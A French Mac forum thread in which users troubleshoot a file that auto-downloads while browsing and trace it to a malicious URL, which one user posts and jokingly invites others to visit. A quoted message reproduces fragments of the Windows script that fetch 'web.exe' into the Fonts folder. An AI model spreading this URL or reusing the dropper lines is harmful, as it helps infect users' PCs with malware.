Téléchargement étrange

Il est revenu le virus en se téléchargeant tous seul comme un grand sur mon bureau , sans que je ne fasse rien , comme un grand alors que j'étais entrain de lire un article sur cuk : http://www.cuk.ch/articles.php?unique=642&categorie_rech=humeur .

le même que celui dont je parle au début de ce thread, je vais aller voir sur " téléchargement " si je trouve un indice.

marco68 : tu le veux de nouveau ???? :D :D :D :D :D :D :D :D :D
 
c'est pénible à la fin, le dossier s'est encore téléchargé tout seul alors que j'étais ici cette fois ci : http://www.clubic.com/actualite-20542-nouvelle-roadmap-pour-firefox.html

je voudrais bien comprendre pourquoi moi?

une idée ? et je dois faire quoi pour que cela s'arrête?

j'espère que le mois prochain lorsque j'installerai tiger en faisant une clean install ça règlera le problème... :mad: :mad:
 
T'as vérifié les réglages de ton firewall ? T'as peut-être un trou ? As tu une IP fixe, ou une dynamique ?
 
Pascal 77 a dit:
T'as vérifié les réglages de ton firewall ? T'as peut-être un trou ? As tu une IP fixe, ou une dynamique ?
Cliquez pour agrandir...

les règlages de mon firewall n'ont pas bougé, il est bien activé et j'ai juste autorisé le partage de fichiers mac et le partage de musique itunes ( je suis sur panther )

et j'ai une adresse IP non fixe
 
kathy h a dit:
les règlages de mon firewall n'ont pas bougé, il est bien activé et j'ai juste autorisé le partage de fichiers mac et le partage de musique itunes ( je suis sur panther )

et j'ai une adresse IP non fixe
Cliquez pour agrandir...

Donc tu peux difficilement être victime d'un cheval de troye, ça deviens mystérieux ton histoire. Tu as plusieurs Mac, c'est sur un seul ou ils ont tous le phénomène ?
 
Pascal 77 a dit:
Donc tu peux difficilement être victime d'un cheval de troye, ça deviens mystérieux ton histoire. Tu as plusieurs Mac, c'est sur un seul ou ils ont tous le phénomène ?
Cliquez pour agrandir...

Mes 2 mac sur Paris n'ont pas ce problème et à mon domicile j'ai aussi 2 mac mais je ne sert que de l'IMac G5 pratiquement jamais de l'imac G3 donc ce n'est que sur mon iMac G5 que ce gentil
" virus " pour window arrive ......
( donc sur 4 , 1 seul est concerné mais c'est l'ordi que j'utilse le plus )
 
kathy h a dit:
Mes 2 mac sur Paris n'ont pas ce problème et à mon domicile j'ai aussi 2 mac mais je ne sert que de l'IMac G5 pratiquement jamais de l'imac G3 donc ce n'est que sur mon iMac G5 que ce gentil
" virus " pour window arrive ......
( donc sur 4 , 1 seul est concerné mais c'est l'ordi que j'utilse le plus )
Cliquez pour agrandir...
Et si, exceptionnellement tu tentait de faire depuis le G3 ce que tu fais depuis le G5. Le but de la manip, c'est de savoir si le problème est lié à ta connexion internet ou à ton réseau, ou si t'as une merde planquée sur ton Mac. Au fait, j'me souviens plus, ton réseau, ethernet ou ouifi ?
 
Ah, bah ch'suis con, c'est dans ta signature. Alors, ce qu'il faudrait tenter, c'est de fermer la ouifi, et de repasser en filaire, histoire de voir si ça arrive aussi quand t'es seule sur le réseau à coup sur (en d'autres termes, savoir si ta connexion wi fi n'est pas utilisée à ton insue dans le voisinage). Si tu n'as pas les cables, change de clé Wep tous les jours pendant quelques jours pour voir, ainsi que tes mots de passe root et administrateur sur le Mac. Parce que si ça se trouve, ta merde, elle vient pas par internet, mais par le partage de fichiers.
 
Pascal 77 a dit:
Ah, bah ch'suis con, c'est dans ta signature. Alors, ce qu'il faudrait tenter, c'est de fermer la ouifi, et de repasser en filaire, histoire de voir si ça arrive aussi quand t'es seule sur le réseau à coup sur (en d'autres termes, savoir si ta connexion wi fi n'est pas utilisée à ton insue dans le voisinage). Si tu n'as pas les cables, change de clé Wep tous les jours pendant quelques jours pour voir, ainsi que tes mots de passe root et administrateur sur le Mac. Parce que si ça se trouve, ta merde, elle vient pas par internet, mais par le partage de fichiers.
Cliquez pour agrandir...

dans le voisinage? un petit village de 250 habitants avec le premier voisin a plus de 500 mètres.. ça m'etonnerait que le problème vienne de là mais bon... en plus c'est récent ( quelques jours seulement )

en fait le G3 est relié en ethernet au routeur et le G5 en wifi ( carte airport extrem )

tu me conseille de mettre le G5 en ethernet mais quelle va être la difference j'ai pas tout compris là

:confused:
 
Eh bien, si tu n'es plus en wi fi et que ça continue, tu seras sure, et sinon et si ça recommence quand tu repasse en wifi, tu sera fixée aussi. La seule autre option, c'est que c'est un script (java ou autre) qui charge le virus. Ah oui, j'ai pensé aussi à un truc que tu peux tenter avant : change le répertoire par défaut de tes téléchargements. Si ça apparait toujours sur ton bureau, c'est que ce n'est pas un téléchargement.
 
Pascal 77 a dit:
Eh bien, si tu n'es plus en wi fi et que ça continue, tu seras sure, et sinon et si ça recommence quand tu repasse en wifi, tu sera fixée aussi. La seule autre option, c'est que c'est un script (java ou autre) qui charge le virus. Ah oui, j'ai pensé aussi à un truc que tu peux tenter avant : change le répertoire par défaut de tes téléchargements. Si ça apparait toujours sur ton bureau, c'est que ce n'est pas un téléchargement.
Cliquez pour agrandir...

à chaque fois que le dossier est apparu le fichier de téléchargement s'ouvrait et se refermait et dans ma fenêtre de téléchargement le dossier en question est bien là.. d'ailleurs comment fait on pour connaitre le site d'un dossier qui est dans la fenêtre " téléchargement" je ne l'ai pas effacé expret

j'écris du G3, avant de repasser en ethernet sur le G5, j'essaye un peu le G3 histoire de voir si le dossier litigieux se télécharge aussi sur cet ordi.
que c'est mou un G3
:mad:
 
Tu fais un clic droit sur le téléchargement (ou ctrl-clic) et dans le menu contextuel, tu choisis "copier l'adresse", puis tu la colle ensuite dans la barre d'adresse, ou sur un document texte. Si tu en as plusieur, vérifie qu'ils ont tous la même adresse.
 
voici l'adresse : http://barasos.com/traffic/js/in.php

quand je vais à cette adresse le téléchargement du dossier se fait automatiquement
`
essayez :D ( pas de risque il suffit de le jeter c'est un virus window )

alors pourquoi ce téléchargement s'effectue tout seul quand je suis sur un site qui n'a rien à voir avec cette adresse?
 
Parce qu'un (ou plusieur) des sites que tu visites présente un lien vers cette adresse, ce qui laisse penser qu'il est lui même infecté. Comme tu peux le voir lorsque tu te connectes sur l'adresse, le téléchargement à lieu, puis l'adresse s'efface. Si tu parviens à identifier le site, préviens son webmestre qu'il est infecté. J'ai regardé le fichier, je pense que c'est un script windows qui introduit le virus sur PC.
 
kathy h a dit:
voici l'adresse : http://barasos.com/traffic/js/in.php

quand je vais à cette adresse le téléchargement du dossier se fait automatiquement
`
essayez :D ( pas de risque il suffit de le jeter c'est un virus window )

alors pourquoi ce téléchargement s'effectue tout seul quand je suis sur un site qui n'a rien à voir avec cette adresse?
Cliquez pour agrandir...

Bonsoir.

Je viens de faire l'essai.
Au téléchargement, Tiger le reconnaît comme une application.
Norton AntiVirus ( à jour ) ne lui trouve rien de suspect.
Par précaution, il vient de finir à la corbeille pour destruction.
De toute façon, pas d'application suggérée par l'iMac pour l'ouvrir. :confused:
 
Pascal 77 a dit:
Parce qu'un (ou plusieur) des sites que tu visites présente un lien vers cette adresse, ce qui laisse penser qu'il est lui même infecté. Comme tu peux le voir lorsque tu te connectes sur l'adresse, le téléchargement à lieu, puis l'adresse s'efface. Si tu parviens à identifier le site, préviens son webmestre qu'il est infecté. J'ai regardé le fichier, je pense que c'est un script windows qui introduit le virus sur PC.
Cliquez pour agrandir...


j'ai déjà écrit à cuk et voici sa réponse :

"Bonjour,

Je ne pense pas que le code malicieux vienne de cuk.ch. Notre serveur est
analysé régulièrement par Swisscenter, il est peu probable qu'il contienne
un virus.

De toute façon le virus ne peut absolument rien faire sur un Mac.

Noé Cuneo "
 
Inor a dit:
Bonsoir.

Je viens de faire l'essai.
Au téléchargement, Tiger le reconnaît comme une application.
Norton AntiVirus ( à jour ) ne lui trouve rien de suspect.
Par précaution, il vient de finir à la corbeille pour destruction.
De toute façon, pas d'application suggérée par l'iMac pour l'ouvrir. :confused:
Cliquez pour agrandir...

c'est normal que Norton n'est rien vu car ce n'est pas un virus pour mac ( il n'y en a pas à ce jour , mas pour PC)

sur tiger tu pouvais l'ouvrir avec tex Edit , le message de NightWalker dans ce même fil était le suivant :

" J'ai ouvert le script avec "TextEdit"... et je pense que c'est une fois de plus destiné pour Windows. Il y a quand même ces lignes qui m'intriguent :

ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
set dot=CreateObject(strreverse(megret))
dot.Open "GET", "../web.exe", false
On dirait que ce script télécharge sur le net un fichier qui s'appelle "web.exe"... et voilà ce que je trouve sur WEB.EXE... "

en tout cas sur le PC de notre ami marco68 ; qui s'est amusé à s'envoyer par mail ce dossier de son mac à son pc ; une fois le ficher ouvert c'était bien un virus et son anti virus a passé la nuit à tout nettoyer...
;) :D :D
 
Norton détecte les virus PC aussi (le mien en tout cas). Il ne lui trouve rien, et pour cause, ce n'est pas un virus, c'est un script qui à pour objet, semble-t-il de télécharger le virus lui même, mais qui se trouve sur Mac, comme un AppleScript sur PC. Kathy, as-tu communiqué l'adresse à ce webmestre, en précisant ce qui précède ?
 

Sujets similaires

Pineappl
macOS Sonoma Problème de Finder, Chrome et téléchargements (et réglages).
Réponses
2
Affichages
572
macOS
Bicus
Bicus
S
macOS Big Sur Exportation de Photos en panne, stockage et sauvegarde
Réponses
8
Affichages
993
macOS
Serth
S
jeamy
Fichiers impossible à déplacer vers bureau
Réponses
10
Affichages
2K
macOS
jeamy
jeamy
J
macOS Ventura Dossiers principaux disparus
Réponses
17
Affichages
2K
macOS
juliensl
J
M
10.14 Mojave Bureau non modifiable
Réponses
2
Affichages
859
macOS
moi
M
Haut Bas